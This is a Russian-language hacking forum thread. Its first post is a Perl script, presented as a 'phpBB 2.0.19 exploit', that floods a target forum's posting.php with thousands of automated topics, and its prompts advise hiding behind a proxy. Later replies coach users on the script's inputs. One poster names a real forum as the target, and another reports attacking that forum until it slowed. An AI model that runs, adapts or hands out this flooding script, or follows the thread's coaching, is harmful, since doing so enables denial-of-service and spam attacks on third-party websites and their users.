Форумы exploit phpBB 2.0.19 ( by SpiderZ )

Discussion in 'Уязвимости CMS/форумов' started by liauliau, 10 Mar 2006.

  1. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    работает отлично! :D

    Code:
    #!/usr/bin/perl 
    
    print q{ 
    _________________________________________________________________________ 
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>| 
    
               /      \ 
            \  \  ,,  /  / 
             '-.`\()/`.-' 
            .--_'(  )'_--. 
           / /` /`""`\ `\ \           * SpiderZ ForumZ Security * 
            |  |  ><  |  | 
            \  \      /  / 
                '.__.'        
    
    
    => Exploit phpBB 2.0.19 ( by SpiderZ ) 
    => Topic infinitely exploit 
    => Sito: www.spiderz.tk 
    
    _________________________________________________________________________ 
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>| 
    
    }; 
    
    use IO::Socket; 
    
    ## Initialized X 
    $x = 0; 
    
    ## Exploit phpbb 2.0.19 SpiderZ 
    print q( 
    Exploit phpBB 2.0.19 ( by SpiderZ ) 
    
    ); 
    print q( 
    => Scrivi l'url del sito senza aggiungere http & www 
    => Url: ); 
    $host = <STDIN>; 
    chop ($host); 
    
    print q( 
    => Adesso indica in quale cartella e posto il phpbb 
    => di solito si trova su /phpBB2/ o /forum/ 
    => Cartella: ); 
    $pth = <STDIN>; 
    chop ($pth); 
    
    print q( 
    => Occhio usa un proxy prima di effettuare l'attacco 
    => il tuo ip verra spammato sul pannello admin del forum 
    => Per avviare l'exploit scrivi " hacking " 
    => ); 
    $type = <STDIN>; 
    chop ($type); 
    
    ## Search exploit phpbb by SpiderZ 
    if($type == 1){ 
    
    ## Search exploit phpbb by SpiderZ 
    while($x != 0000) 
    { 
    
    ## Search exploit phpbb by SpiderZ 
    $x++; 
    } 
    
    ## Nome attack Hacking 
    } 
    elsif ($type == hacking){ 
    
    ## Search exploit phpbb by SpiderZ 
    while($x != 10000) 
    { 
    ## Invia Search exploit phpbb by SpiderZ 
    $postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19"; 
    
    ## Posit Length 
    $lrg = length $postit; 
    
    ## Connect Socket with Variables Provided By User 
    my $sock = new IO::Socket::INET ( 
                                     PeerAddr => "$host", 
                                     PeerPort => "80", 
                                     Proto => "tcp", 
                                    ); 
    die "\nConnessione non riuscita: $!\n" unless $sock; 
    
    ## Invia Search exploit phpbb by SpiderZ 
    print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n"; 
    print $sock "Host: $host\n"; 
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
    print $sock "Referer: $host\n"; 
    print $sock "Accept-Language: en-us\n"; 
    print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
    print $sock "Content-Length: $lrg\n\n"; 
    print $sock "$postit\n"; 
    close($sock); 
    
    ## exploit phpbb by SpiderZ 
    syswrite STDOUT, "."; 
    
    ## exploit phpbb by SpiderZ 
    $x++; 
    } 
    }else{ 
    
    ## Error Exploit phpbb 
       die " 
    Error ! riprova... 
    \n"; 
    } 
     
  2. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Насколько я понял-флудер простенький...
     
  3. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    у меня не работает....
     
  4. Buga

    Buga Elder - Старейшина

    Joined:
    29 Jul 2005
    Messages:
    63
    Likes Received:
    8
    Reputations:
    -1
    да и толку от него ? аналогов да е**** мени :p
     
    #4 Buga, 10 Mar 2006
    Last edited by a moderator: 11 Mar 2006
  5. donetsk

    donetsk Elder - Старейшина

    Joined:
    30 Jan 2006
    Messages:
    158
    Likes Received:
    14
    Reputations:
    2
    не работает у меня :( и что делать , если стоит запрет время ввода сообщений каждый 10 минут например!
     
  6. by_online

    by_online Banned

    Joined:
    18 Jan 2006
    Messages:
    13
    Likes Received:
    0
    Reputations:
    -2
    thanksss ;)
     
  7. Black_Death

    Black_Death New Member

    Joined:
    16 Nov 2004
    Messages:
    26
    Likes Received:
    1
    Reputations:
    -1
    Ну да я ламо..ну объясните плз как его использовать поподробнее...забил понимаешь на хакинг и на те..уже нихера не понимаю)))эх...раньше всё попороще было)))
     
  8. Жора

    Жора New Member

    Joined:
    5 Feb 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    во времена счётной машинки паскаля
    базаров нет
     
  9. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    video нужнa ?
     
  10. Black_Death

    Black_Death New Member

    Joined:
    16 Nov 2004
    Messages:
    26
    Likes Received:
    1
    Reputations:
    -1
    не...уже вроде вкурил чё и как
     
  11. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Эксплоит работает, но осталась пара вопросов. Например, за что отвечает секция
    Code:
    print q( 
    => Occhio usa un proxy prima di effettuare l'attacco 
    => il tuo ip verra spammato sul pannello admin del forum 
    => Per avviare l'exploit scrivi " hacking " 
    => ); 
    $type = <STDIN>; 
    chop ($type);
     
  12. mr-troy

    mr-troy Banned

    Joined:
    14 Dec 2006
    Messages:
    3
    Likes Received:
    3
    Reputations:
    -5
    народ, как рубить, так и не вкурил
    запустил сплой
    в 1ом меню че вписывать?
    допустим сайт forum.site.ru
    в первом пишу: "forum.site.ru"
    вторая строчка: "/"
    третья - это ваще че?
    обьясните ученику :)
     
  13. LoneWolf666

    LoneWolf666 Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    207
    Likes Received:
    121
    Reputations:
    12
    Ненавижу сплоеты от пауков, т.к. все указания на узбекском, хрен проссыш что надо.
    Объясните чё они спрашивают при запуске своих сплоетов? Например этого
     
  14. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Трудно понять по скрипту?
    1. вводите сервак без http, www и /
    2. вводите директорию форума в виде /dir/. Если её нет, то просто /
    3. это хрень какая-то. Может принимать значения 1 или hacking. Проверены оба - форум падает.

    Я его откомпилировал в exe и русифицировал. Ржачная штука...
     
    #14 DeBugger, 13 Jan 2007
    Last edited: 13 Jan 2007
    1 person likes this.
  15. LoneWolf666

    LoneWolf666 Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    207
    Likes Received:
    121
    Reputations:
    12
    Всё сделал как ты сказал. В результате ноль реакции.
    просто появляется новая командная строка вида D:\Perl\bin> и всё. Ноль реакции

    А вообще сколько времени занимает работа сплоита?
     
    #15 LoneWolf666, 13 Jan 2007
    Last edited: 13 Jan 2007
  16. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Уверен ли ты, что атакуемый форум уязвим? (Если можно - ссылку)
    Время работы зависит от разных факторов (например, скорости сети). Пока он работает, в консоли бегает ряд точек. Окончив работу, скрипт закрывается (В случае невозможности подключения - тоже). Сейчас проверил: Насчёт пункта 3 я накосячил. У меня с 1 этот скрипт вылетел, а hacking должен сработать. Пробуй!
     
  17. Burned

    Burned New Member

    Joined:
    5 Jan 2007
    Messages:
    8
    Likes Received:
    3
    Reputations:
    0
    гм... если я не ошибаюсь: вывод на экран заданного текста, присвоение переменной значения, введенного пользователем и урезание последнего введенного символа соответственно) (т.е. "/n")

    или вопрос был про $type? :)

    тогда извиняюсь, туплю)

    здесь пишется про что-то, связанное с прокси.. язык итальянский, перевод с транслэйта:
     
    #17 Burned, 13 Jan 2007
    Last edited: 13 Jan 2007
    1 person likes this.
  18. LoneWolf666

    LoneWolf666 Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    207
    Likes Received:
    121
    Reputations:
    12
    Сцылка - http://game.aaanet.ru/forum/
    При вводе слова хакинг просто стоит картинка, курсор мигает. И всё. И так минут 20. Под конец с матом вырубаю
     
  19. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Проверил на 128 кб/с (валить не стал, сбросил). Да, периодически курсор останавливается, потом продолжает. И так "этапами". Потом пытался войти на форум - он тормознул заметно. Значит, сработало. Вводил так:
    1. game.aaanet.ru
    2. /forum/
    3. hacking


    Burned, спасибо. Я искал только смысл упомянутой фигни.
     
  20. Ali_MiX

    Ali_MiX Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    377
    Likes Received:
    67
    Reputations:
    -2
    Да